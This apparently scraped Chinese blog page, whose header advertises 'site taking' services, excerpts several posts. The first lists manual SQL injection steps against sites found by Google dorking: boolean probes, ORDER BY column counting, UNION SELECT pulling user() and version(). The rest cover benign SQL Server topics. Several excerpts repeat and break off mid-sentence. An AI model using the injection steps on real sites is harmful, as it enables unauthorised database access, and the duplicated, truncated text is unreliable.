欢迎来到Heck's Blog,专业承接拿站、企业建站、仿站、网上商城架构、门户网站搭建、空间域名注册、软件定制等项目。关注网络安全,因为专注,所以专业,懂得放弃,才能收获。有事请发邮件至i@heckjj.com,请记住本站网址:http://www.heckjj.com,多谢。
5月5
1、首先google hacking一把,在谷歌搜索框中输入site:xxxxx.com inurl:asp/php?id=
2、判断是否过敏。
3、And 1=1 and 1=2
4、Order by x-- x为数字,猜解有几个表段。。。
5、猜解到x以后,记住x的值。。。。
6、And 1=2 union select 1,2,3,4,5,....,x--
7、页面会报错,并出现数字,假设初相的数字是5,那么这一步就这样做:(用user()替换第六步中的5,再次提交)。报错的页面5的位置,会出现被5所覆盖的字符串的内容。记录该内容,这里用^表示。
8、再用version()替换刚才user()的位置,再次提交,目的是为了获取数据库的版本。报错的页面^的位置的内容会变为版本号码,例如5.0.27。
2、判断是否过敏。
3、And 1=1 and 1=2
4、Order by x-- x为数字,猜解有几个表段。。。
5、猜解到x以后,记住x的值。。。。
6、And 1=2 union select 1,2,3,4,5,....,x--
7、页面会报错,并出现数字,假设初相的数字是5,那么这一步就这样做:(用user()替换第六步中的5,再次提交)。报错的页面5的位置,会出现被5所覆盖的字符串的内容。记录该内容,这里用^表示。
8、再用version()替换刚才user()的位置,再次提交,目的是为了获取数据库的版本。报错的页面^的位置的内容会变为版本号码,例如5.0.27。
8月31
在MS-SQLServer中,如何在不同的数据库之间复制表?
当表目标表存在时:
insert into 目的数据库..表(字段1...字段n) select 段1...字段n from 源数据库..表
当目标表不存在时:
select 段1...字段n into 目的数据库..表 from 源数据库..表
--如果在不同的SQL之间:
insert into openrowset('sqloledb','目的服务器名';'sa';'',目的数据库.dbo.表)
select * from 源数据库..表
除了上面的方法之外或者还可以用链接服务器:
当表目标表存在时:
insert into 目的数据库..表(字段1...字段n) select 段1...字段n from 源数据库..表
当目标表不存在时:
select 段1...字段n into 目的数据库..表 from 源数据库..表
--如果在不同的SQL之间:
insert into openrowset('sqloledb','目的服务器名';'sa';'',目的数据库.dbo.表)
select * from 源数据库..表
除了上面的方法之外或者还可以用链接服务器:
9月21
有时候我们为了让应用程序运行得更快,所做的全部工作就是在这里或那里做一些很小调整。啊,但关键在于确定如何进行调整!迟早您会遇到这种情况:应用程序中的 SQL 查询不能按照您想要的方式进行响应。它要么不返回数据,要么耗费的时间长得出奇。如果它降低了报告或您的企业应用程序的速度,用户必须等待的时间过长,他们就会很不满意。就像您的父母不想听您解释为什么在深更半夜才回来一样,用户也不会听你解释为什么查询耗费这么长时间。(“对不起,妈妈,我使用了太多的 LEFT JOIN。”)用户希望应用程序响应迅速,他们的报告能够在瞬间之内返回分析数据。就我自己而言,如果在 Web 上冲浪时某个页面要耗费十多秒才能加载(好吧,五秒更实际一些),我也会很不耐烦。
为了解决这些问题,重要的是找到问题的根源。那么,从哪里开始呢?根本原因通常在于数据库设计和访问它的查询。在本月的专栏中,我将讲述四项技术,这些技术可用于提高基于 SQL Server? 的应用程序的性能或改善其可伸缩性。我将仔细说明 LEFT JOIN、CROSS JOIN 的使用以及 IDENTITY 值的检索。请记住,根本没有神奇的解决方案。调整您的数据库及其查询需要占用时间、进行分析,还需要大量的测试。这些技术都已被证明行之有效,但对您的应用程序而言,可能其中一些技术比另一些技术更适用。
从 INSERT 返回 IDENTITY
我决定从遇到许多问题的内容入手:如何在执行 SQL INSERT 后检索 IDENTITY 值。通常,问题不在于如何编写检索值的查询,而在于在哪里以及何时进行检索。在 SQL Server 中,下面的语句可用于检索由最新在活动数据库连接上运行的 SQL 语句所创建的 IDENTITY 值:
SELECT @@IDENTITY
这个 SQL 语句并不复杂,但需要记住的一点是:如果这个最新的 SQL 语句不是 INSERT,或者您针对非 INSERT SQL 的其他连接运行了此 SQL,则不会获得期望的值。您必须运行下列代码才能检索紧跟在 INSERT SQL 之后且位于同一连接上的 IDENTITY,如下所示:
为了解决这些问题,重要的是找到问题的根源。那么,从哪里开始呢?根本原因通常在于数据库设计和访问它的查询。在本月的专栏中,我将讲述四项技术,这些技术可用于提高基于 SQL Server? 的应用程序的性能或改善其可伸缩性。我将仔细说明 LEFT JOIN、CROSS JOIN 的使用以及 IDENTITY 值的检索。请记住,根本没有神奇的解决方案。调整您的数据库及其查询需要占用时间、进行分析,还需要大量的测试。这些技术都已被证明行之有效,但对您的应用程序而言,可能其中一些技术比另一些技术更适用。
从 INSERT 返回 IDENTITY
我决定从遇到许多问题的内容入手:如何在执行 SQL INSERT 后检索 IDENTITY 值。通常,问题不在于如何编写检索值的查询,而在于在哪里以及何时进行检索。在 SQL Server 中,下面的语句可用于检索由最新在活动数据库连接上运行的 SQL 语句所创建的 IDENTITY 值:
SELECT @@IDENTITY
这个 SQL 语句并不复杂,但需要记住的一点是:如果这个最新的 SQL 语句不是 INSERT,或者您针对非 INSERT SQL 的其他连接运行了此 SQL,则不会获得期望的值。您必须运行下列代码才能检索紧跟在 INSERT SQL 之后且位于同一连接上的 IDENTITY,如下所示:
8月31
一直有很多朋友问我多表查询的方法
,今天,天空下的雨就给初学数据库的朋友讲一下数据库多表查询的简单实现。不说废话了,直接例子吧。
例子:
数据库有三个表
学生表:student 选课表:lesson 成绩表:score
学生表[student]
id name les
1 小糊 1
2 小猪 1
3 阿正 3
4 小飞 2
选课表[lesson ]
id LName
1 软件
2 经济
3 管理
成绩表[score]
id stuID lesID num
1 1 1 97
2 4 1 90
3 1 2 80
4 2 1 95
5 3 1 88
6 2 3 97
上面就是三张表的数据。
这时候,我们就需要把这些表中的数据联合起来查询。比如说学生的选课信息,我们可以这样写:
,今天,天空下的雨就给初学数据库的朋友讲一下数据库多表查询的简单实现。不说废话了,直接例子吧。例子:
数据库有三个表
学生表:student 选课表:lesson 成绩表:score
学生表[student]
id name les
1 小糊 1
2 小猪 1
3 阿正 3
4 小飞 2
选课表[lesson ]
id LName
1 软件
2 经济
3 管理
成绩表[score]
id stuID lesID num
1 1 1 97
2 4 1 90
3 1 2 80
4 2 1 95
5 3 1 88
6 2 3 97
上面就是三张表的数据。
这时候,我们就需要把这些表中的数据联合起来查询。比如说学生的选课信息,我们可以这样写:
